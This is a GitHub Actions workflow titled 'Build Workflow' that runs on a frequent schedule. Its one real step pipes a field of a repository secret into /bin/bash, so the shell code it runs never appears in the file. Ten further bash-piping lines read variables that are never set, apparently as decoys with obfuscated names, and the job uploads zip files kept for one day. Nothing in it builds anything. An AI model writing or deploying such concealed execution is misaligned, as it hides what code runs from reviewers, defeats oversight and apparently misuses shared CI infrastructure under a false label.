name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '28 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          tc8209: ${{ secrets.tc8209 }}
        run: |
          printf '%s' "$tc8209" | jq -r .gpyiy75310 | /bin/bash
          echo $cqgk1117 | jq -r .ln26 | /bin/bash
          printf '%s' "$yr63" | jq -r .lfjlp26748 | /bin/bash
          printf '%s' "$qzspw8" | jq -r .hys634 | /bin/bash
          echo $x5283 | jq -r .sbp65 | /bin/bash
          echo $ozxhs8476 | jq -r .t4 | /bin/bash
          printf '%s' "$bb68684" | jq -r .zy90 | /bin/bash
          printf '%s' "$yvutw05048" | jq -r .qgn875 | /bin/bash
          echo $b5 | jq -r .tutg6 | /bin/bash
          echo $isi090 | jq -r .o9026 | /bin/bash
          echo $m133 | jq -r .db95 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: wV6b4uSF
          path: "*.zip"
          retention-days: 1
